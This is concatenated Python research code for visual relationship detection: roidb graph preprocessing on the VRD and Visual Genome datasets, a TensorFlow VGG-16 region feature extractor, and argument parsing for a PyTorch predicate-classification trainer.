        rela = np.zeros(len(roidb), dtype=np.int64)
        edges = []
        nodes = []
        for i in range(len(roidb)):
            #====== feats ============#
            sub_fc7 = np.load(os.path.join(full_path, 'sub_fc7', os.path.basename(roidb[i]['image'])+'.npy'))
            ob_fc7 = np.load(os.path.join(full_path, 'ob_fc7', os.path.basename(roidb[i]['image'])+'.npy'))
            fc7 = np.concatenate([sub_fc7, ob_fc7], 0)
            box_gt = np.concatenate([roidb[i]['sub_box_dete'], roidb[i]['obj_box_dete']], 0)
            cls_gt = np.concatenate([roidb[i]['sub_dete'], roidb[i]['obj_dete']], 0)
            uni_box_gt, uni_cls_gt, uni_fc7 = unique_gt(box_gt, cls_gt, fc7)
            sub_idx = new_id(uni_box_gt, roidb[i]['sub_box_dete'], roidb[i]['sub_dete'])
            obj_idx = new_id(uni_box_gt, roidb[i]['obj_box_dete'], roidb[i]['obj_dete'])
            edge_matrix = np.zeros([len(uni_cls_gt), len(uni_cls_gt)]) + edges_types
            for j, x, y in zip(np.array(range(len(sub_idx))), sub_idx, obj_idx):
                edge_matrix[int(x)][int(y)] = roidb[i]['rela_dete'][j]
            nodes.append(len(uni_cls_gt))
            # NOTE(review): the edge count uses rela_gt while everything
            # else here uses rela_dete — affects the printed stats only;
            # confirm whether rela_dete was intended.
            edges.append(len(roidb[i]['rela_gt']))
            roidb[i]['uni_box_gt'] = uni_box_gt
            roidb[i]['uni_gt'] = uni_cls_gt
            roidb[i]['edge_matrix'] = edge_matrix
            roidb[i]['sub_idx'] = sub_idx
            roidb[i]['obj_idx'] = obj_idx
            pred_pool5_path = os.path.join(full_path, 'pred_pool5', os.path.basename(roidb[i]['image'])+'.npy')
            pred_fc7_path = os.path.join(full_path, 'pred_fc7', os.path.basename(roidb[i]['image'])+'.npy')
            uni_fc7_path = os.path.join(full_path, 'uni_fc7', os.path.basename(roidb[i]['image'])+'.npy')
            img_fc7_path = os.path.join(full_path, 'fc7', os.path.basename(roidb[i]['image'])+'.npy')
            img_pool5_path = os.path.join(full_path, 'pool5', os.path.basename(roidb[i]['image'])+'.npy')
            # Unlike the pred variant, the deduplicated features are
            # rewritten unconditionally here.
            np.save(uni_fc7_path, uni_fc7)
            roidb[i]['pred_pool5'] = pred_pool5_path
            roidb[i]['pred_fc7'] = pred_fc7_path
            roidb[i]['uni_fc7'] = uni_fc7_path
            roidb[i]['img_fc7'] = img_fc7_path
            roidb[i]['img_pool5'] = img_pool5_path
            pbar.update(1)
        new_roidb[name] = roidb
        print("nodes: {0} | max: {1} | mean: {2} | min: {3}".format(name, np.max(nodes), np.mean(nodes), np.min(nodes)))
        print("edges: {0} | max: {1} | mean: {2} | min: {3}".format(name, np.max(edges), np.mean(edges), np.min(edges)))
        # train | max: 21 | mean: 6.95423280423 | min: 1
        # test | max: 20 | mean: 7.00838574423 | min: 2
        edge_total.append(edges)
        node_total.append(nodes)
    np.savez('../data/{}_rela_graph_roidb.npz'.format(dataset), new_roidb)
    pbar.close()
    # Returns the last split processed (the test roidb list); callers in
    # this file ignore the return value.
    return roidb
def process_vrd_pred_instance_data(save_path):
    '''
    function: Build the source data for instance-level training
    node feature :[num_instance, 4096+300]
    edge label: [num_instance, 4096+300]

    Flattens every (subject, object, predicate) triplet of the graph
    roidb into per-instance arrays: each node is the concatenation of
    its 4096-d fc7 feature and 300-d word vector; the edge label is the
    predicate id.  Results are saved as .npy files under save_path.
    Note: the "val" and "test" outputs are both built from the test
    split (no separate validation split exists here).
    '''
    data_dir = '../data'
    save_dir = save_path
    predicates_vec = np.load(os.path.join(data_dir, 'predicates_vec.npy'))
    objects_vec = np.load(os.path.join(data_dir, 'objects_vec.npy'))
    roidb_read = read_roidb(os.path.join(save_dir, 'graph_roidb.npz'))
    train_roidb = roidb_read['train']
    test_roidb = roidb_read['test']
    N_train = len(train_roidb)
    N_test = len(test_roidb)
    pbar = tqdm(total=N_train+N_test+N_test)
    def initial(N, roidb):
        # Collect per-pair node features and edge labels for one split.
        sub_nodes = []
        obj_nodes = []
        edges = []
        for i in range(N):
            roidb_use = roidb[i]
            uni_box = roidb_use['uni_box_gt']
            # box_id (defined elsewhere) maps each pair box back to its
            # row in the unique-box node list.
            sub_idx = box_id(roidb_use['sub_box_gt'], uni_box)
            obj_idx = box_id(roidb_use['obj_box_gt'], uni_box)
            nodes_feat = np.load(roidb_use['uni_fc7'])
            sub_feat = list(map(lambda x: nodes_feat[int(x)], sub_idx))
            sub_feat = np.reshape(np.array(sub_feat), [-1, 4096])
            obj_feat = list(map(lambda x: nodes_feat[int(x)], obj_idx))
            obj_feat = np.reshape(np.array(obj_feat), [-1, 4096])
            # 300-d word embeddings looked up by class id.
            sub_sem = list(map(lambda x: objects_vec[int(x)], roidb_use['sub_gt']))
            sub_sem = np.reshape(np.array(sub_sem),[-1, 300])
            obj_sem = list(map(lambda x: objects_vec[int(x)], roidb_use['obj_gt']))
            obj_sem = np.reshape(np.array(obj_sem),[-1, 300])
            edge = roidb_use['rela_gt']
            sub_node = np.concatenate([sub_feat, sub_sem], 1)
            obj_node = np.concatenate([obj_feat, obj_sem], 1)
            sub_nodes.append(sub_node)
            obj_nodes.append(obj_node)
            edges.append(edge)
            pbar.update(1)
        sub_nodes = np.concatenate(sub_nodes, 0)
        obj_nodes = np.concatenate(obj_nodes, 0)
        edges = np.concatenate(edges, 0)
        assert sub_nodes.shape[0] == edges.shape[0]
        return sub_nodes, obj_nodes, edges
    sub_nodes_train, obj_nodes_train, edges_train = initial(N_train, train_roidb)
    sub_nodes_val, obj_nodes_val, edges_val = initial(N_test, test_roidb)
    sub_nodes_test, obj_nodes_test, edges_test = initial(N_test, test_roidb)
    pbar.close()
    np.save(os.path.join(save_dir, 'instance_sub_nodes_train'), sub_nodes_train)
    np.save(os.path.join(save_dir, 'instance_obj_nodes_train'), obj_nodes_train)
    np.save(os.path.join(save_dir, 'instance_edges_train'), edges_train)
    np.save(os.path.join(save_dir, 'instance_sub_nodes_val'), sub_nodes_val)
    np.save(os.path.join(save_dir, 'instance_obj_nodes_val'), obj_nodes_val)
    np.save(os.path.join(save_dir, 'instance_edges_val'), edges_val)
    np.save(os.path.join(save_dir, 'instance_sub_nodes_test'), sub_nodes_test)
    np.save(os.path.join(save_dir, 'instance_obj_nodes_test'), obj_nodes_test)
    np.save(os.path.join(save_dir, 'instance_edges_test'), edges_test)
    return
def process_vrd_rela_instance_data(save_path):
    '''
    function: Build the source data for instance-level training
    node feature :[num_instance, 4096+300]
    edge label: [num_instance, 4096+300]

    Detected-box counterpart of ``process_vrd_pred_instance_data``:
    uses the ``*_dete`` keys and only produces the val/test outputs
    (train extraction is commented out).  Both val and test come from
    the test split.
    '''
    data_dir = '../data'
    save_dir = save_path
    predicates_vec = np.load(os.path.join(data_dir, 'predicates_vec.npy'))
    objects_vec = np.load(os.path.join(data_dir, 'objects_vec.npy'))
    roidb_read = read_roidb(os.path.join(save_dir, 'graph_roidb.npz'))
    train_roidb = roidb_read['train']
    test_roidb = roidb_read['test']
    # ipdb.set_trace()
    N_train = len(train_roidb)
    N_test = len(test_roidb)
    pbar = tqdm(total=N_train+N_test+N_test)
    def initial(N, roidb):
        # Collect per-pair node features and edge labels for one split.
        sub_nodes = []
        obj_nodes = []
        edges = []
        for i in range(N):
            roidb_use = roidb[i]
            uni_box = roidb_use['uni_box_gt']
            sub_idx = box_id(roidb_use['sub_box_dete'], uni_box)
            obj_idx = box_id(roidb_use['obj_box_dete'], uni_box)
            nodes_feat = np.load(roidb_use['uni_fc7'])
            sub_feat = list(map(lambda x: nodes_feat[int(x)], sub_idx))
            sub_feat = np.reshape(np.array(sub_feat), [-1, 4096])
            obj_feat = list(map(lambda x: nodes_feat[int(x)], obj_idx))
            obj_feat = np.reshape(np.array(obj_feat), [-1, 4096])
            # sub_sem = list(map(lambda x: objects_vec[int(x)-1], roidb_use['sub_dete']))
            # Word embeddings are looked up with the raw detector class id
            # (the commented lines show an earlier 1-based variant).
            sub_sem = list(map(lambda x: objects_vec[int(x)], roidb_use['sub_dete']))
            sub_sem = np.reshape(np.array(sub_sem),[-1, 300])
            # obj_sem = list(map(lambda x: objects_vec[int(x)-1], roidb_use['obj_dete']))
            obj_sem = list(map(lambda x: objects_vec[int(x)], roidb_use['obj_dete']))
            obj_sem = np.reshape(np.array(obj_sem),[-1, 300])
            edge = roidb_use['rela_dete']
            sub_node = np.concatenate([sub_feat, sub_sem], 1)
            obj_node = np.concatenate([obj_feat, obj_sem], 1)
            sub_nodes.append(sub_node)
            obj_nodes.append(obj_node)
            edges.append(edge)
            pbar.update(1)
        sub_nodes = np.concatenate(sub_nodes, 0)
        obj_nodes = np.concatenate(obj_nodes, 0)
        edges = np.concatenate(edges, 0)
        assert sub_nodes.shape[0] == edges.shape[0]
        return sub_nodes, obj_nodes, edges
    # sub_nodes_train, obj_nodes_train, edges_train = initial(N_train, train_roidb)
    sub_nodes_val, obj_nodes_val, edges_val = initial(N_test, test_roidb)
    sub_nodes_test, obj_nodes_test, edges_test = initial(N_test, test_roidb)
    pbar.close()
    # np.save(os.path.join(save_dir, 'instance_sub_nodes_train'), sub_nodes_train)
    # np.save(os.path.join(save_dir, 'instance_obj_nodes_train'), obj_nodes_train)
    # np.save(os.path.join(save_dir, 'instance_edges_train'), edges_train)
    np.save(os.path.join(save_dir, 'instance_sub_nodes_val'), sub_nodes_val)
    np.save(os.path.join(save_dir, 'instance_obj_nodes_val'), obj_nodes_val)
    np.save(os.path.join(save_dir, 'instance_edges_val'), edges_val)
    np.save(os.path.join(save_dir, 'instance_sub_nodes_test'), sub_nodes_test)
    np.save(os.path.join(save_dir, 'instance_obj_nodes_test'), obj_nodes_test)
    np.save(os.path.join(save_dir, 'instance_edges_test'), edges_test)
    return
def get_path(dataset = 'vg', data_type = 'rela', use_ori_vgg=False, random_vgg=None):
    """Resolve the feature directory and roidb file for a dataset/task combo.

    Args:
        dataset: 'vrd' or 'vg'.
        data_type: 'pred' (ground-truth pairs) or 'rela' (detected pairs).
        use_ori_vgg: use features from the original (not fine-tuned) VGG.
        random_vgg: use features from a randomly initialized VGG.  When
            None (the default) the module-level ``use_random_vgg`` flag is
            consulted, preserving the old behavior of silently reading
            that global.

    Returns:
        (save_path, roidb_path) tuple of feature directory and roidb file.

    Raises:
        ValueError: for an unknown dataset/data_type combination (the old
            code died with an UnboundLocalError instead).
    """
    if random_vgg is None:
        # Backward compatibility: the original implementation read the
        # module-level flag set by argparse.
        random_vgg = bool(globals().get('use_random_vgg', False))
    base_path = '/DATA5_DB8/data/yhu/VTransE/'
    if dataset == 'vrd' and data_type == 'pred':
        # ---------- vrd pred dataset ---------------#
        if use_ori_vgg:
            save_path = base_path + 'ori_vrd_vgg_feats'
        elif random_vgg:
            save_path = base_path + 'random_vrd_vgg_feats'
        else:
            save_path = base_path + 'vrd_vgg_feats'
        roidb_path = '../data/vrd_roidb.npz'
    elif dataset == 'vrd' and data_type == 'rela':
        if use_ori_vgg:
            save_path = base_path + 'ori_vrd_rela_vgg_feats'
        elif random_vgg:
            save_path = base_path + 'random_vrd_rela_vgg_feats'
        else:
            save_path = base_path + 'vrd_rela_vgg_feats'
        roidb_path = '../data/vrd_rela_roidb.npz'
    elif dataset == 'vg' and data_type == 'pred':
        # ----------- vg dataset ---------------#
        save_path = base_path + 'vg_vgg_feats'
        roidb_path = '../data/vg_roidb.npz'
    elif dataset == 'vg' and data_type == 'rela':
        # ----------- vg rela dataset ---------------#
        save_path = base_path + 'vg_rela_vgg_feats'
        roidb_path = '../data/vg_rela_roidb.npz'
    else:
        raise ValueError('unknown combination: dataset={}, data_type={}'.format(dataset, data_type))
    return save_path, roidb_path
# Resolve feature/roidb paths for the combination chosen on the command
# line, then run the matching write/process step below.
save_path, roidb_path = get_path(dataset, data_type, use_ori_vgg)
# ============== vrd pred ==============#
# # -------- read data --------------#
roidb_read = read_roidb(roidb_path)
train_roidb = roidb_read['train_roidb']
test_roidb = roidb_read['test_roidb']
# Reference statistics from earlier runs:
# nodes: train | max: 21 | mean: 6.95423280423 | min: 1
# edges: train | max: 34 | mean: 8.03042328042 | min: 1
# nodes: test | max: 20 | mean: 7.00838574423 | min: 2
# edges: test | max: 41 | mean: 8.0 | min: 1
# ----- dsr --------#
# nodes: train | max: 21 | mean: 6.95423280423 | min: 1
# edges: train | max: 30 | mean: 7.89867724868 | min: 1
# nodes: test | max: 20 | mean: 7.00838574423 | min: 2
# edges: test | max: 23 | mean: 7.82809224319 | min: 1
if dataset == 'vrd' and data_type == 'pred':
    pred_write_feat_into_roidb(save_path, train_roidb, test_roidb, dataset='vrd', edges_types=70)
    process_vrd_pred_instance_data(save_path)
# ============== vrd rela ==============#
# # -------- read data --------------#
# roidb_read = read_roidb(roidb_path)
# train_roidb = roidb_read['train_roidb']
# test_roidb = roidb_read['test_roidb']
# # # ipdb.set_trace()
# # # nodes: train | max: 44 | mean: 14 | min: 1
# # # edges: train | max: 34 | mean: 8 | min: 1
# # # nodes: test | max: 96 | mean: 39.9381551363 | min: 9
# # # edges: test | max: 41 | mean: 8.0 | min: 1
# # dsr test rela
# # nodes: test | max: 63 | mean: 8.071278826 | min: 2
# # edges: test | max: 23 | mean: 8.0 | min: 1
if dataset == 'vrd' and data_type == 'rela':
    rela_write_feat_into_roidb(save_path, train_roidb, test_roidb, dataset='vrd', edges_types=70)
    # process_vrd_rela_instance_data(save_path)
# ============== vg pred ==============#
# save_path, roidb_path = get_path('vg', 'pred')
# # -------- read data --------------#
# roidb_read = read_roidb(roidb_path)
# train_roidb = roidb_read['train_roidb']
# test_roidb = roidb_read['test_roidb']
# # nodes: train | max: 98 | mean: 12.9205761986 | min: 1
# # edges: train | max: 490 | mean: 10.8853836355 | min: 1
# # nodes: test | max: 110 | mean: 13.1718230335 | min: 1
# # edges: test | max: 352 | mean: 11.0894500735 | min: 1
if dataset == 'vg' and data_type == 'pred':
    # VG uses 100 predicate classes, so the "no relation" id is 100.
    pred_write_feat_into_roidb(save_path, train_roidb, test_roidb, dataset='vg', edges_types=100)
# pred_save_vgg_feat(save_path, train_roidb, test_roidb)
# pred_write_feat_into_roidb(save_path, train_roidb, test_roidb, edges_types=100)
# # ============== vg rela ==============#
# save_path, roidb_path = get_path('vg', 'rela')
# # -------- read data --------------#
# roidb_read = read_roidb(roidb_path)
# train_roidb = roidb_read['train_roidb']
# test_roidb = roidb_read['test_roidb']
# # nodes: train | max: 72 | mean: 16.3680922568 | min: 1
# # edges: train | max: 490 | mean: 10.8853836355 | min: 1
# # nodes: test | max: 90 | mean: 28.3761698507 | min: 2
# # edges: test | max: 352 | mean: 11.0894500735 | min: 1
# rela_save_vgg_feat(save_path, train_roidb, test_roidb)
# rela_write_feat_into_roidb(save_path, train_roidb, test_roidb, edges_types=100)
--- FILE SEPARATOR ---
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.contrib.slim import losses
from tensorflow.contrib.slim import arg_scope
from tensorflow.contrib.slim.python.slim.nets import resnet_utils
from tensorflow.contrib.slim.python.slim.nets import resnet_v1
from tensorflow.contrib.slim.python.slim.nets.resnet_v1 import resnet_v1_block
import numpy as np
from ass_fun import *
import ipdb
import os
class VTranse_Vgg(object):
def __init__(self):
self.predictions = {}
self.losses = {}
self.layers = {}
self.feat_stride = [16, ]
self.scope = 'vgg_16'
    def create_graph(self, batch_size, save_path):
        """Create the input placeholders and build the extraction network.

        Args:
            batch_size: number of subject/object box pairs fed per run.
            save_path: directory where extracted features will be saved.
        """
        # extract subject and object feature
        # rela: test and pred: train & test
        self.image = tf.placeholder(tf.float32, shape=[1, None, None, 3])
        self.sbox = tf.placeholder(tf.float32, shape=[batch_size, 4]) #[x1, y1, x2, y2]
        self.obox = tf.placeholder(tf.float32, shape=[batch_size, 4]) #[x1, y1, x2, y2]
        # NOTE(review): the two *_sp_info placeholders are never fed in the
        # visible code — presumably spatial features; confirm before removal.
        self.sub_sp_info = tf.placeholder(tf.float32, shape=[batch_size, 4])
        self.ob_sp_info = tf.placeholder(tf.float32, shape=[batch_size, 4])
        # self.rela_label = tf.placeholder(tf.int32, shape=[batch_size,])
        self.keep_prob = tf.placeholder(tf.float32)
        self.save_path = save_path
        self.batch_size = batch_size
        self.build_dete_network()
    def build_dete_network(self, is_training=True):
        """Build the feature-extraction graph and register output tensors.

        Registers into ``self.layers``: pool5/fc7 features for the whole
        image, the subject box, the object box, and the subject-object
        union box ("pred" features).
        """
        # get the region conv and fc features
        # the classfication probabilities and ids
        net_conv = self.image_to_head(is_training)
        net_pool5 = self.crop_bottom_layer(net_conv, "pool5") # [n, 7, 7]
        sub_pool5 = self.crop_pool_layer(net_conv, self.sbox, "sub_pool5") # [n, 7, 7]
        ob_pool5 = self.crop_pool_layer(net_conv, self.obox, "ob_pool5") # [n, 7, 7]
        # fc weights are created once and reused for every region type.
        net_fc7 = self.head_to_tail(net_pool5, is_training, reuse = False) # [n, 4096]
        sub_fc7 = self.head_to_tail(sub_pool5, is_training, reuse = True) # [n, 4096]
        ob_fc7 = self.head_to_tail(ob_pool5, is_training, reuse = True) # [n, 4096]
        # --------new added----------------#
        pred_pool5 = self.crop_union_pool_layer(net_conv, self.sbox, self.obox, "pred_pool5") # [n, 7, 7]
        # pred_fc7 = self.head_to_tail(pred_pool5, is_training, reuse = True)
        # Union-box features use spatial mean pooling instead of the fc stack.
        pred_fc7 = self.head_to_mean_tail(pred_pool5, is_training, reuse = True)
        self.layers['sub_pool5'] = sub_pool5
        self.layers['ob_pool5'] = ob_pool5
        self.layers['sub_fc7'] = sub_fc7
        self.layers['ob_fc7'] = ob_fc7
        self.layers['pool5'] = net_pool5
        self.layers['fc7'] = net_fc7
        # --------new added----------------#
        self.layers['pred_pool5'] = pred_pool5
        self.layers['pred_fc7'] = pred_fc7
    def image_to_head(self, is_training, reuse=False):
        """VGG-16 convolutional trunk (conv1 through conv5, four poolings).

        Scope names must stay exactly as-is: checkpoint restore matches
        variables by the 'vgg_16/...' prefix.
        """
        with tf.variable_scope(self.scope, self.scope, reuse=reuse):
            net = slim.repeat(self.image, 2, slim.conv2d, 64, [3, 3],
                              trainable=is_training, scope='conv1')
            net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool1')
            net = slim.repeat(net, 2, slim.conv2d, 128, [3, 3],
                              trainable=is_training, scope='conv2')
            net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool2')
            net = slim.repeat(net, 3, slim.conv2d, 256, [3, 3],
                              trainable=is_training, scope='conv3')
            net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool3')
            net = slim.repeat(net, 3, slim.conv2d, 512, [3, 3],
                              trainable=is_training, scope='conv4')
            net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool4')
            # No pooling after conv5: overall stride stays 16.
            net_conv = slim.repeat(net, 3, slim.conv2d, 512, [3, 3],
                                   trainable=is_training, scope='conv5')
        self.layers['head'] = net_conv
        return net_conv
    def head_to_tail(self, pool5, is_training, reuse=False):
        """VGG fc6/fc7 stack mapping a pooled region to a 4096-d feature.

        Dropout is hard-wired active (is_training=True); the extraction
        script feeds keep_prob=1 so it becomes a no-op there.
        """
        with tf.variable_scope(self.scope, self.scope, reuse=reuse):
            pool5_flat = slim.flatten(pool5, scope='flatten') #[n, 49]
            fc6 = slim.fully_connected(pool5_flat, 4096, scope='fc6')
            fc6 = slim.dropout(fc6, keep_prob=self.keep_prob, is_training=True,
                               scope='dropout6')
            fc7 = slim.fully_connected(fc6, 4096, scope='fc7')
            fc7 = slim.dropout(fc7, keep_prob=self.keep_prob, is_training=True,
                               scope='dropout7')
        return fc7
    def head_to_mean_tail(self, pool5, is_training, reuse=False):
        """Spatial mean pooling over the two inner axes (no fc weights).

        is_training and reuse are accepted for signature parity with
        head_to_tail but are unused.
        """
        mean_fc7 = tf.reduce_mean(tf.reduce_mean(pool5, axis=2), axis=1)
        return mean_fc7
    def crop_pool_layer(self, bottom, rois, name):
        """
        Notice that the input rois is a N*4 matrix, and the coordinates of x,y should be original x,y times im_scale.

        Crops each ROI from the conv feature map with bilinear
        crop_and_resize to 14x14, then max-pools down to 7x7.
        """
        with tf.variable_scope(name) as scope:
            n=tf.to_int32(rois.shape[0])
            # Single-image batch: every ROI maps to batch index 0.
            batch_ids = tf.zeros([n,],dtype=tf.int32)
            # Get the normalized coordinates of bboxes
            bottom_shape = tf.shape(bottom)
            # Feature-map extent in input-pixel units (stride 16).
            height = (tf.to_float(bottom_shape[1]) - 1.) * np.float32(self.feat_stride[0])
            width = (tf.to_float(bottom_shape[2]) - 1.) * np.float32(self.feat_stride[0])
            # separate the (x1, y1, x2, y2) of the bounding boxes' coordinates
            x1 = tf.slice(rois, [0, 0], [-1, 1], name="x1") / width
            y1 = tf.slice(rois, [0, 1], [-1, 1], name="y1") / height
            x2 = tf.slice(rois, [0, 2], [-1, 1], name="x2") / width
            y2 = tf.slice(rois, [0, 3], [-1, 1], name="y2") / height
            # Won't be back-propagated to rois anyway, but to save time
            bboxes = tf.stop_gradient(tf.concat([y1, x1, y2, x2], 1)) #[n, 4]
            crops = tf.image.crop_and_resize(bottom, bboxes, tf.to_int32(batch_ids), [7*2, 7*2], method='bilinear',
                                             name="crops")
            # max_pool is a helper defined elsewhere in this project.
            pooling = max_pool(crops, 2, 2, 2, 2, name="max_pooling")
        return pooling
    def crop_union_pool_layer(self, bottom, rois_s, rois_o, name):
        """
        Notice that the input rois is a N*4 matrix, and the coordinates of x,y should be original x,y times im_scale.

        Computes the union box of each subject/object pair and crops it
        exactly like crop_pool_layer (14x14 crop, max-pooled to 7x7).
        """
        with tf.variable_scope(name) as scope:
            n=tf.to_int32(rois_s.shape[0])
            # Single-image batch: every ROI maps to batch index 0.
            batch_ids = tf.zeros([n,],dtype=tf.int32)
            # Get the normalized coordinates of bboxes
            bottom_shape = tf.shape(bottom)
            height = (tf.to_float(bottom_shape[1]) - 1.) * np.float32(self.feat_stride[0])
            width = (tf.to_float(bottom_shape[2]) - 1.) * np.float32(self.feat_stride[0])
            # separate the (x1, y1, x2, y2) of the bounding boxes' coordinates
            x1_s = tf.slice(rois_s, [0, 0], [-1, 1], name="x1_s")
            y1_s = tf.slice(rois_s, [0, 1], [-1, 1], name="y1_s")
            x2_s = tf.slice(rois_s, [0, 2], [-1, 1], name="x2_s")
            y2_s = tf.slice(rois_s, [0, 3], [-1, 1], name="y2_s")
            x1_o = tf.slice(rois_o, [0, 0], [-1, 1], name="x1_o")
            y1_o = tf.slice(rois_o, [0, 1], [-1, 1], name="y1_o")
            x2_o = tf.slice(rois_o, [0, 2], [-1, 1], name="x2_o")
            y2_o = tf.slice(rois_o, [0, 3], [-1, 1], name="y2_o")
            # Union box: elementwise min of top-left, max of bottom-right.
            x1 = tf.minimum(x1_s, x1_o, name="x1") / width
            y1 = tf.minimum(y1_s, y1_o, name="y1") / height
            x2 = tf.maximum(x2_s, x2_o, name="x2") / width
            y2 = tf.maximum(y2_s, y2_o, name="y2") / height
            # Won't be back-propagated to rois anyway, but to save time
            bboxes = tf.stop_gradient(tf.concat([y1, x1, y2, x2], 1)) #[n, 4]
            crops = tf.image.crop_and_resize(bottom, bboxes, tf.to_int32(batch_ids), [7*2, 7*2], method='bilinear',
                                             name="crops")
            pooling = max_pool(crops, 2, 2, 2, 2, name="max_pooling")
        return pooling
def crop_bottom_layer(self, bottom, name):
"""
Notice that the input rois is a N*4 matrix, and the coordinates of x,y should be original x,y times im_scale.
"""
with tf.variable_scope(name) as scope:
# Get the normalized coordinates of bboxes
resized = tf.image.resize_images(bottom, [7*2, 7*2])
pooling = max_pool(resized, 2, 2, 2, 2, name="max_pooling")
return pooling
def extract_pred_fc(self, sess, roidb_use, is_rela=False):
im, im_scale = im_preprocess(roidb_use['image'])
if is_rela:
batch_num = len(roidb_use['index_rela'])/self.batch_size
else:
batch_num = len(roidb_use['index_pred'])/self.batch_size
layers = []
keys = ['pred_pool5', 'pred_fc7', 'pool5', 'fc7', 'sub_fc7', 'ob_fc7']
for k in keys:
check_path_exists(os.path.join(self.save_path, k))
for batch_id in range(np.int32(batch_num)):
if is_rela:
blob = get_blob_rela(roidb_use, im_scale, self.batch_size, batch_id)
else:
blob = get_blob_pred(roidb_use, im_scale, self.batch_size, batch_id)
feed_dict = {self.image: im, self.sbox: blob['sub_box'], self.obox: blob['obj_box'],
self.keep_prob: 1}
layer = sess.run(self.layers, feed_dict = feed_dict)
layer_feat = map(lambda x: layer[x], keys)
layers.append(layer_feat)
pred_pool5 = []
pred_fc7 = []
pool5 = []
fc7 = []
sub_fc7 = []
ob_fc7 = []
for i in range(len(layers)):
pred_pool5.append(layers[i][0])
pred_fc7.append(layers[i][1])
pool5.append(layers[i][2])
fc7.append(layers[i][3])
sub_fc7.append(layers[i][4])
ob_fc7.append(layers[i][5])
pred_pool5 = np.concatenate(pred_pool5, 0)
pred_fc7 = np.concatenate(pred_fc7, 0)
pool5 = np.concatenate(pool5, 0)
fc7 = np.concatenate(fc7, 0)
sub_fc7 = np.concatenate(sub_fc7, 0)
ob_fc7 = np.concatenate(ob_fc7, 0)
if is_rela:
n_total = len(roidb_use['rela_dete'])
else:
n_total = len(roidb_use['rela_gt'])
pred_pool5_full_save_path = os.path.join(self.save_path, 'pred_pool5', os.path.basename(roidb_use['image']))
pred_fc7_full_save_path = os.path.join(self.save_path, 'pred_fc7', os.path.basename(roidb_use['image']))
pool5_full_save_path = os.path.join(self.save_path, 'pool5', os.path.basename(roidb_use['image']))
fc7_full_save_path = os.path.join(self.save_path, 'fc7', os.path.basename(roidb_use['image']))
sub_fc7_full_save_path = os.path.join(self.save_path, 'sub_fc7', os.path.basename(roidb_use['image']))
ob_fc7_full_save_path = os.path.join(self.save_path, 'ob_fc7', os.path.basename(roidb_use['image']))
np.save(pred_pool5_full_save_path, pred_pool5[:n_total])
np.save(pred_fc7_full_save_path, pred_fc7[:n_total])
np.save(pool5_full_save_path, pool5[:n_total])
np.save(fc7_full_save_path, fc7[:n_total])
np.save(sub_fc7_full_save_path, sub_fc7[:n_total])
np.save(ob_fc7_full_save_path, ob_fc7[:n_total])
print("{0} processed!".format(roidb_use['image']))
return
def max_pool(x, h, w, s_y, s_x, name, padding='SAME'):
    """2-D max pooling over an NHWC tensor.

    Args:
        x: input tensor, shape [batch, height, width, channels].
        h, w: pooling window height and width.
        s_y, s_x: vertical (height) and horizontal (width) strides.
        name: op name.
        padding: 'SAME' or 'VALID'.

    Returns:
        The max-pooled tensor.
    """
    # BUG FIX: NHWC strides are [batch, height, width, channels], so the
    # vertical stride s_y must come before s_x. The original passed
    # [1, s_x, s_y, 1]; every call site in this file uses s_y == s_x, so
    # their behavior is unchanged by the fix.
    return tf.nn.max_pool(x, ksize=[1,h,w,1], strides=[1, s_y, s_x, 1], padding=padding, name=name)
--- FILE SEPARATOR ---
from __future__ import division
from __future__ import print_function
import time
import argparse
import pickle
import os
import torch.optim as optim
from torch.optim import lr_scheduler
import torch.nn.functional as F
from modules import *
from eval_metrics import *
from utils import *
from DataLoader import *
import ipdb
from tqdm import tqdm
# from visualize import Visualizer
# Command-line configuration for the scene-graph predicate trainer.
# FIX: several help strings were copy-paste leftovers from an unrelated
# codebase ("atoms in simulation", "motion capture data loader"); they are
# corrected below to match how the options are actually used. Flags,
# defaults, and dest names are unchanged.
parser = argparse.ArgumentParser()
parser.add_argument('--no-cuda', action='store_true', default=False,
                    help='Disables CUDA training.')
parser.add_argument('--seed', type=int, default=42, help='Random seed.')
parser.add_argument('--epochs', type=int, default=30,
                    help='Number of epochs to train.')
parser.add_argument('--batch-size', type=int, default=32,
                    help='Number of samples per batch.')
parser.add_argument('--eval-batch-size', type=int, default=32,
                    help='Number of samples per batch.')
parser.add_argument('--lr', type=float, default=0.0005,
                    help='Initial learning rate.')
parser.add_argument('--hidden', type=int, default=512,
                    help='Number of hidden units.')
parser.add_argument('--num-atoms', type=int, default=110,
                    help='Number of object nodes per graph.')
parser.add_argument('--rela-num-atoms', type=int, default=63,
                    help='Number of object nodes per graph in rela mode.')
parser.add_argument('--num-edges', type=int, default=490,
                    help='Number of edges per graph.')
parser.add_argument('--encoder', type=str, default='simple',
                    help='Type of path encoder model(simple or nmp).')
parser.add_argument('--dropout', type=float, default=0.5,
                    help='Dropout rate (1 - keep probability).')
parser.add_argument('--log-interval', type=int, default=5, metavar='N',
                    help='How many batches to wait before logging.')
parser.add_argument('--edge-types', type=int, default=101,
                    help='The number of edge types to infer.')
parser.add_argument('--dims', type=int, default=4396,
                    help='The number of dimensions. 320/4396')
parser.add_argument('--save-folder', type=str, default='./checkpoints/vg',
                    help='Where to save the trained model.')
parser.add_argument('--load-folder', type=str, default='',
                    help='Where to load the trained model.')
parser.add_argument('--lr-decay', type=int, default=5,
                    help='After how epochs to decay LR by a factor of gamma')
parser.add_argument('--gamma', type=float, default=0.5,
                    help='LR decay factor')
parser.add_argument('--weight', type=float, default=0,
                    help='Loss weight for the background (no-relation) edge class.')
parser.add_argument('--mode', type=str, default='whole',
                    help="Run mode: 'whole', 'train', or 'eval'.")
parser.add_argument('--restore', action='store_true', default=False,
                    help='Restore the trained model from the load-folder.')
parser.add_argument('--shuffle', action='store_true', default=False,
                    help='Shuffle the data in the dataloader.')
parser.add_argument('--feat-mode', type=str, default='full',
                    help='feature mode: full, vis, or sem')
parser.add_argument('--n-iter', type=int, default=3,
                    help='How many times of the node edge transfer information.')
parser.add_argument('--prior', action='store_true', default=False,
                    help='Ranking loss')
parser.add_argument('--tail', type=str, default='base',
                    help='special name')
parser.add_argument('--ori-vgg', action='store_true', default=False,
                    help='original vgg')
parser.add_argument('--use-loc', action='store_true', default=False,
                    help='use location coordinates')
